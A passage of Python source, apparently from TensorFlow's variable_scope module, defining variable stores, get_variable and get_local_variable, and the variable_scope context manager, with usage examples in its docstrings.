# pylint: disable=protected-access
return var_store._get_partitioned_variable(
full_name, shape=shape, dtype=dtype, initializer=initializer,
regularizer=regularizer, reuse=self.reuse, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=use_resource, constraint=constraint)
# pylint: enable=protected-access
_VARSTORE_KEY = ("__variable_store",)
_VARSCOPESTORE_KEY = ("__varscope",)
class _VariableScopeStore(threading.local):
"""A thread local store for the current variable scope and scope counts."""
def __init__(self):
super(_VariableScopeStore, self).__init__()
self.current_scope = VariableScope(False)
self.variable_scopes_count = {}
def open_variable_scope(self, scope_name):
if scope_name in self.variable_scopes_count:
self.variable_scopes_count[scope_name] += 1
else:
self.variable_scopes_count[scope_name] = 1
def close_variable_subscopes(self, scope_name):
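# Zero the usage counts of every sub-scope of scope_name (or of all scopes
# when scope_name is None).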
for k in list(self.variable_scopes_count.keys()):
if scope_name is None or k.startswith(scope_name + "/"):
self.variable_scopes_count[k] = 0
def variable_scope_count(self, scope_name):
return self.variable_scopes_count.get(scope_name, 0)
def get_variable_scope_store():
"""Returns the variable scope store for current thread."""
scope_store = ops.get_collection(_VARSCOPESTORE_KEY)
if not scope_store:
scope_store = _VariableScopeStore()
ops.add_to_collection(_VARSCOPESTORE_KEY, scope_store)
else:
scope_store = scope_store[0]
return scope_store
@tf_export(v1=["get_variable_scope"])
def get_variable_scope():
"""Returns the current variable scope."""
return get_variable_scope_store().current_scope
def _get_default_variable_store():
store = ops.get_collection(_VARSTORE_KEY)
if store:
return store[0]
store = _VariableStore()
ops.add_to_collection(_VARSTORE_KEY, store)
return store
@tf_contextlib.contextmanager
def with_variable_store(store):
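# Temporarily replace the graph's variable store collection with `store`,
# restoring the previous contents when the context exits.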
store_collection = ops.get_collection_ref(_VARSTORE_KEY)
old = list(store_collection)
store_collection[:] = [store]
try:
yield
finally:
store_collection[:] = old
class EagerVariableStore(object):
"""Wrapper allowing functional layers to be used with eager execution.
When eager execution is enabled Variables get deleted when they go out of
scope, and are not stored in global collections by default. A lot of code
(mostly the functional layers in tf.layers) assumes that variables are kept in
a global list.
EagerVariableStore can be used in conjunction with this code to make it
eager-friendly. For example, to create a dense layer, use:
```
container = tfe.EagerVariableStore()
for input in dataset_iterator:
with container.as_default():
x = tf.layers.dense(input, name="l1")
print(container.variables()) # Should print the variables used in the layer.
```
"""
def __init__(self, store=None):
if store is not None:
if not store._store_eager_variables: # pylint: disable=protected-access
raise ValueError("Cannot construct EagerVariableStore from a "
"VariableStore object that does not hold eager "
"variables.")
self._store = store
else:
self._store = _VariableStore()
self._store._store_eager_variables = True # pylint: disable=protected-access
def as_default(self):
return with_variable_store(self._store)
def variables(self):
return sorted(self._store._vars.values(), key=lambda x: x.name) # pylint: disable=protected-access
def trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def non_trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if not x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def copy(self):
"""Copy this variable store and all of its contents.
Variables contained in this store will be copied over to the new variable
store, meaning that they can be modified without affecting the variables in
this store.
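For illustration only, a sketch of the copy semantics, assuming eager
execution is enabled and `tfe` refers to `tf.contrib.eager` as in the class
docstring above:
```
store = tfe.EagerVariableStore()
with store.as_default():
  v = tf.get_variable("v", initializer=1.0)
snapshot = store.copy()
v.assign(2.0)  # the copy inside `snapshot` still holds the value 1.0
```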
Returns:
A new EagerVariableStore instance containing copied variables.
"""
# pylint: disable=protected-access
new_store = EagerVariableStore()
for key, var in iteritems(self._store._vars):
# Strip device out of variable name.
try:
index = var.name.index(":")
except ValueError:
stripped_var_name = var.name
else:
stripped_var_name = var.name[:index]
# Create new variable with same value, name, and "trainable" flag.
new_var = resource_variable_ops.ResourceVariable(
var.read_value(),
name=stripped_var_name,
trainable=var.trainable)
new_store._store._vars[key] = new_var
return new_store
# pylint: enable=protected-access
# The argument list for get_variable must match arguments to get_local_variable.
# So, if you are updating the arguments, also update arguments to
# get_local_variable below.
@tf_export(v1=["get_variable"])
def get_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
return get_variable_scope().get_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
get_variable_or_local_docstring = ("""%s
%sThis function prefixes the name with the current variable scope
and performs reuse checks. See the
[Variable Scope How To](https://tensorflow.org/guide/variables)
for an extensive description of how reusing works. Here is a basic example:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
If initializer is `None` (the default), the default initializer passed in
the variable scope will be used. If that one is `None` too, a
`glorot_uniform_initializer` will be used. The initializer can also be
a Tensor, in which case the variable is initialized to this value and shape.
Similarly, if the regularizer is `None` (the default), the default regularizer
passed in the variable scope will be used (if that is `None` too,
then by default no regularization is performed).
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
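For illustration only, a hedged sketch of requesting a partitioned variable
with one of the built-in partitioners (the shape and byte limit are arbitrary):
```python
w = tf.get_variable(
    "w", shape=[1024, 256],
    partitioner=tf.variable_axis_size_partitioner(max_shard_bytes=1 << 20))
# Accessing `w` as a `Tensor` concatenates the shards along the partition axis.
```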
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created. Can either be
an initializer object or a Tensor. If it's a Tensor, its shape must be known
unless validate_shape is False.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
`tf.GraphKeys.REGULARIZATION_LOSSES` and can be used for regularization.
%scollections: List of graph collections keys to add the Variable to.
Defaults to `[%s]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known. For this to be used the initializer must be a Tensor and
not an initializer object.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable instead with well-defined semantics.
Defaults to False (will later change to True). When eager execution is
enabled this argument is always forced to be True.
custom_getter: Callable that takes as a first argument the true getter, and
allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when violating reuse during variable creation, or when `initializer` dtype
and `dtype` don't match. Reuse is set inside `variable_scope`.
""")
get_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing variable with these parameters or create a new one.",
"",
"trainable: If `True` also add the variable to the graph collection\n"
" `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n ",
"GraphKeys.GLOBAL_VARIABLES")
# The argument list for get_local_variable must match arguments to get_variable.
# So, if you are updating the arguments, also update arguments to get_variable.
@tf_export(v1=["get_local_variable"])
def get_local_variable( # pylint: disable=missing-docstring
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=False, # pylint: disable=unused-argument
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
if collections:
collections += [ops.GraphKeys.LOCAL_VARIABLES]
else:
collections = [ops.GraphKeys.LOCAL_VARIABLES]
return get_variable(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=False,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation,
custom_getter=custom_getter,
constraint=constraint)
get_local_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing *local* variable or creates a new one.",
"Behavior is the same as in `get_variable`, except that variables are\n"
"added to the `LOCAL_VARIABLES` collection and `trainable` is set to\n"
"`False`.\n",
"",
"GraphKeys.LOCAL_VARIABLES")
def _get_partitioned_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable instead which has well-defined semantics.
Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
Returns:
A `PartitionedVariable` object.
Raises:
ValueError: when creating a new variable and shape is not declared,
or when violating reuse during variable creation. Reuse is set inside
`variable_scope`.
"""
# pylint: disable=protected-access
scope = get_variable_scope()
if scope.custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % scope.custom_getter)
return scope._get_partitioned_variable(
_get_default_variable_store(), name, shape=shape, dtype=dtype,
initializer=initializer, regularizer=regularizer, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=use_resource, constraint=constraint)
# pylint: enable=protected-access
# Named like a function for compatibility with the previous
# @tf_contextlib.contextmanager definition.
class _pure_variable_scope(object): # pylint: disable=invalid-name
"""A context for the variable_scope, see `variable_scope` for docs."""
def __init__(self,
name_or_scope,
reuse=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
old_name_scope=None,
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a context for the variable_scope, see `variable_scope` for docs.
Note: this does not create a name scope.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
reuse: `True` or None, or tf.AUTO_REUSE; if `None`, we inherit the parent
scope's reuse flag.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
old_name_scope: the original name scope when re-entering a variable scope.
dtype: type of the variables within this scope (defaults to `DT_FLOAT`).
use_resource: If False, variables in this scope will be regular Variables.
If True, experimental ResourceVariables will be created instead, with
well-defined semantics. Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
"""
self._name_or_scope = name_or_scope
self._reuse = reuse
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._old_name_scope = old_name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
self._var_store = _get_default_variable_store()
self._var_scope_store = get_variable_scope_store()
if isinstance(self._name_or_scope, VariableScope):
self._new_name = self._name_or_scope.name
name_scope = self._name_or_scope._name_scope # pylint: disable=protected-access
# Handler for the case when we jump to a shared scope. We create a new
# VariableScope (self._var_scope_object) that contains a copy of the
# provided shared scope, possibly with changed reuse and initializer, if
# the user requested this.
variable_scope_object = VariableScope(
self._name_or_scope.reuse if not self._reuse else self._reuse,
name=self._new_name,
initializer=self._name_or_scope.initializer,
regularizer=self._name_or_scope.regularizer,
caching_device=self._name_or_scope.caching_device,
partitioner=self._name_or_scope.partitioner,
dtype=self._name_or_scope.dtype,
custom_getter=self._name_or_scope.custom_getter,
name_scope=name_scope,
use_resource=self._name_or_scope.use_resource,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(
self._custom_getter, self._name_or_scope.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._cached_variable_scope_object = variable_scope_object
def __enter__(self):
"""Begins the scope block.
Returns:
A VariableScope.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope, or if reuse is not `None` or `True`.
TypeError: when the types of some arguments are not appropriate.
"""
self._old = self._var_scope_store.current_scope
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.open_variable_scope(self._new_name)
self._old_subscopes = copy.copy(
self._var_scope_store.variable_scopes_count)
variable_scope_object = self._cached_variable_scope_object
else:
# Handler for the case when we just prolong current variable scope.
# VariableScope with name extended by the provided one, and inherited
# reuse and initializer (except if the user provided values to set).
self._new_name = (
self._old.name + "/" + self._name_or_scope if self._old.name
else self._name_or_scope)
self._reuse = (self._reuse
or self._old.reuse) # Re-using is inherited by sub-scopes.
if self._old_name_scope is None:
name_scope = self._name_or_scope
else:
name_scope = self._old_name_scope
variable_scope_object = VariableScope(
self._reuse,
name=self._new_name,
initializer=self._old.initializer,
regularizer=self._old.regularizer,
caching_device=self._old.caching_device,
partitioner=self._old.partitioner,
dtype=self._old.dtype,
use_resource=self._old.use_resource,
custom_getter=self._old.custom_getter,
name_scope=name_scope,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._old.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._var_scope_store.open_variable_scope(self._new_name)
self._var_scope_store.current_scope = variable_scope_object
return variable_scope_object
def __exit__(self, type_arg, value_arg, traceback_arg):
# If jumping out from a non-prolonged scope, restore counts.
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.variable_scopes_count = self._old_subscopes
else:
self._var_scope_store.close_variable_subscopes(self._new_name)
self._var_scope_store.current_scope = self._old
def _maybe_wrap_custom_getter(custom_getter, old_getter):
"""Wrap a call to a custom_getter to use the old_getter internally."""
if old_getter is None:
return custom_getter
# The new custom_getter should call the old one
def wrapped_custom_getter(getter, *args, **kwargs):
# Call:
# custom_getter(
# lambda: old_getter(true_getter, ...), *args, **kwargs)
# which means custom_getter will call old_getter, which
# will call the true_getter, perform any intermediate
# processing, and return the results to the current
# getter, which will also perform additional processing.
return custom_getter(
functools.partial(old_getter, getter),
*args, **kwargs)
return wrapped_custom_getter
def _get_unique_variable_scope(prefix):
"""Get a name with the given prefix unique in the current variable scope."""
var_scope_store = get_variable_scope_store()
current_scope = get_variable_scope()
name = current_scope.name + "/" + prefix if current_scope.name else prefix
if var_scope_store.variable_scope_count(name) == 0:
return prefix
idx = 1
while var_scope_store.variable_scope_count(name + ("_%d" % idx)) > 0:
idx += 1
return prefix + ("_%d" % idx)
# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export(v1=["variable_scope"]) # pylint: disable=invalid-name
class variable_scope(object):
"""A context manager for defining ops that creates variables (layers).
This context manager validates that the (optional) `values` are from the same
graph, ensures that graph is the default graph, and pushes a name scope and a
variable scope.
If `name_or_scope` is not None, it is used as is. If `name_or_scope` is None,
then `default_name` is used. In that case, if the same name has been
previously used in the same scope, it will be made unique by appending `_N`
to it.
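A small hedged sketch of this behavior (the function name is only
illustrative):
```python
def make_weight(scope=None):
  with tf.variable_scope(scope, default_name="block"):
    return tf.get_variable("w", [1])
w0 = make_weight()  # created under scope "block"
w1 = make_weight()  # created under the uniquified scope "block_1"
```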
Variable scope allows you to create new variables and to share already created
ones while providing checks to not create or share by accident. For details,
see the [Variable Scope How To](https://tensorflow.org/guide/variables), here
we present only a few basic examples.
Simple example of how to create a new variable:
```python
with tf.variable_scope("foo"):
with tf.variable_scope("bar"):
v = tf.get_variable("v", [1])
assert v.name == "foo/bar/v:0"
```
Simple example of how to reenter a premade variable scope safely:
```python
with tf.variable_scope("foo") as vs:
pass
# Re-enter the variable scope.
with tf.variable_scope(vs,
auxiliary_name_scope=False) as vs1:
# Restore the original name_scope.
with tf.name_scope(vs1.original_name_scope):
v = tf.get_variable("v", [1])
assert v.name == "foo/v:0"
c = tf.constant([1], name="c")
assert c.name == "foo/c:0"
```
Basic example of sharing a variable with AUTO_REUSE:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
Basic example of sharing a variable with reuse=True:
```python
with tf.variable_scope("foo"):
v = tf.get_variable("v", [1])
with tf.variable_scope("foo", reuse=True):
v1 = tf.get_variable("v", [1])
assert v1 == v
```
Sharing a variable by capturing a scope and setting reuse:
```python
with tf.variable_scope("foo") as scope:
v = tf.get_variable("v", [1])
scope.reuse_variables()
v1 = tf.get_variable("v", [1])
assert v1 == v
```
To prevent accidental sharing of variables, we raise an exception when getting
an existing variable in a non-reusing scope.
```python
with tf.variable_scope("foo"):
v = tf.get_variable("v", [1])
v1 = tf.get_variable("v", [1])
# Raises ValueError("... v already exists ...").
```
Similarly, we raise an exception when trying to get a variable that does not
exist in reuse mode.
```python
with tf.variable_scope("foo", reuse=True):
v = tf.get_variable("v", [1])
# Raises ValueError("... v does not exist ...").
```
Note that the `reuse` flag is inherited: if we open a reusing scope, then all
its sub-scopes become reusing as well.
A note about name scoping: Setting `reuse` does not impact the naming of other
ops such as multiplication. See related discussion on
[github#6189](https://github.com/tensorflow/tensorflow/issues/6189)
Note that up to and including version 1.0, it was allowed (though explicitly
discouraged) to pass False to the reuse argument, yielding undocumented
behaviour slightly different from None. Starting at 1.1.0 passing None and
False as reuse has exactly the same effect.
A note about using variable scopes in multi-threaded environment: Variable
scopes are thread local, so one thread will not see another thread's current
scope. Also, when using `default_name`, unique scope names are generated
only on a per-thread basis. If the same name was used within a different
thread, that doesn't prevent a new thread from creating the same scope.
However, the underlying variable store is shared across threads (within the
same graph). As such, if another thread tries to create a new variable with
the same name as a variable created by a previous thread, it will fail unless
reuse is True.
Further, each thread starts with an empty variable scope. So if you wish to
preserve the name prefixes of the main thread's scope, you should capture
that scope and re-enter it in each thread. For example:
```
main_thread_scope = variable_scope.get_variable_scope()
# Thread's target function:
def thread_target_fn(captured_scope):
with variable_scope.variable_scope(captured_scope):
# .... regular code for this thread
thread = threading.Thread(target=thread_target_fn, args=(main_thread_scope,))
```
"""
def __init__(self,
name_or_scope,
default_name=None,
values=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None,
auxiliary_name_scope=True):
"""Initialize the context manager.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
default_name: The default name to use if the `name_or_scope` argument is
`None`; this name will be uniquified. If `name_or_scope` is provided, it
won't be used and therefore it is not required and can be None.
values: The list of `Tensor` arguments that are passed to the op function.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
reuse: `True`, None, or tf.AUTO_REUSE; if `True`, we go into reuse mode
for this scope as well as all sub-scopes; if tf.AUTO_REUSE, we create
variables if they do not exist, and return them otherwise; if None, we
inherit the parent scope's reuse flag. When eager execution is enabled,
new variables are always created unless an EagerVariableStore or
template is currently active.
dtype: type of variables created in this scope (defaults to the type
in the passed scope, or inherited from parent scope).
use_resource: If False, all variables will be regular Variables. If True,
experimental ResourceVariables with well-defined semantics will be used
instead. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
auxiliary_name_scope: If `True`, we create an auxiliary name scope with
the scope. If `False`, we don't create it. Note that the argument is
not inherited, and it only takes effect once, when the scope is created. You
should only use it for re-entering a premade variable scope.
Returns:
A scope that can be captured and reused.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope.
TypeError: when the types of some arguments are not appropriate.
"""
self._name_or_scope = name_or_scope
self._default_name = default_name
self._values = values
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._reuse = reuse
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if self._default_name is None and self._name_or_scope is None:
raise TypeError("If default_name is None then name_or_scope is required")
if self._reuse is False:
# We don't allow non-inheriting scopes: False is treated the same as None here.
self._reuse = None
if not (self._reuse is True
or self._reuse is None
or self._reuse is AUTO_REUSE):
raise ValueError("The reuse parameter must be True or False or None.")
if self._values is None:
self._values = []
self._in_graph_mode = not context.executing_eagerly()
if self._in_graph_mode:
self._graph = ops._get_graph_from_inputs(self._values) # pylint: disable=protected-access
self._cached_pure_variable_scope = None
self._current_name_scope = None
if not isinstance(auxiliary_name_scope, bool):
raise TypeError("The auxiliary_name_scope must be `True` or `False`, "
"while get {}".format(auxiliary_name_scope))
self._auxiliary_name_scope = auxiliary_name_scope
def __enter__(self):
# If the default graph is building a function, then we should not replace it
# with the cached graph.
if ops.get_default_graph().building_function:
self._building_function = True
else:
self._building_function = False
if self._in_graph_mode and not self._building_function:
self._graph_context_manager = self._graph.as_default()
self._graph_context_manager.__enter__()
if self._cached_pure_variable_scope is not None:
# Fast path for re-entering variable_scopes. We've held on to the pure
# variable scope from a previous successful __enter__, so we avoid some
# overhead by re-using that object.
if self._current_name_scope is not None:
self._current_name_scope.__enter__()
return self._cached_pure_variable_scope.__enter__()
try:
return self._enter_scope_uncached()
except:
if self._graph_context_manager is not None:
self._graph_context_manager.__exit__(*sys.exc_info())
raise
def _enter_scope_uncached(self):
"""Enters the context manager when there is no cached scope yet.
Returns:
The entered variable scope.
Raises:
TypeError: A wrong type is passed as `scope` at __init__().
ValueError: `reuse` is incorrectly set at __init__().
"""
if self._auxiliary_name_scope:
# Create a new name scope later
current_name_scope = None
else:
# Reenter the current name scope
name_scope = ops.get_name_scope()
if name_scope:
# Hack to reenter
name_scope += "/"
current_name_scope = ops.name_scope(name_scope)
else:
# Root scope
current_name_scope = ops.name_scope(name_scope)
# IMPORTANT: Only assign to self._cached_pure_variable_scope and
# self._current_name_scope after successful __enter__() calls.
if self._name_or_scope is not None:
if not isinstance(self._name_or_scope,
(VariableScope,) + six.string_types):
raise TypeError("VariableScope: name_or_scope must be a string or "
"VariableScope.")
if isinstance(self._name_or_scope, six.string_types):
name_scope = self._name_or_scope
else:
name_scope = self._name_or_scope.name.split("/")[-1]
if name_scope or current_name_scope:
current_name_scope = current_name_scope or ops.name_scope(name_scope)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
if isinstance(self._name_or_scope, six.string_types):
old_name_scope = current_name_scope_name
else:
old_name_scope = self._name_or_scope.original_name_scope
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=old_name_scope,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else:
self._current_name_scope = None
# This can only happen if someone is entering the root variable scope.
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else: # Here name_or_scope is None. Using default name, but made unique.
if self._reuse:
raise ValueError("reuse=True cannot be used without a name_or_scope")
current_name_scope = current_name_scope or ops.name_scope(
self._default_name)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
unique_default_name = _get_unique_variable_scope(self._default_name)
pure_variable_scope = _pure_variable_scope(
unique_default_name,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=current_name_scope_name,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
def __exit__(self, type_arg, value_arg, traceback_arg):
self._cached_pure_variable_scope.__exit__(
type_arg, value_arg, traceback_arg)
if self._current_name_scope:
self._current_name_scope.__exit__(type_arg, value_arg, traceback_arg)
if self._in_graph_mode and not self._building_function:
self._graph_context_manager.__exit__(type_arg, value_arg, traceback_arg)
# pylint: disable=g-doc-return-or-yield
@tf_export(v1=["variable_op_scope"])
@tf_contextlib.contextmanager
def variable_op_scope(values,
name_or_scope,
default_name=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None):
"""Deprecated: context manager for defining an op that creates variables."""
logging.warn("tf.variable_op_scope(values, name, default_name) is deprecated,"
" use tf.variable_scope(name, default_name, values)")
with variable_scope(name_or_scope,
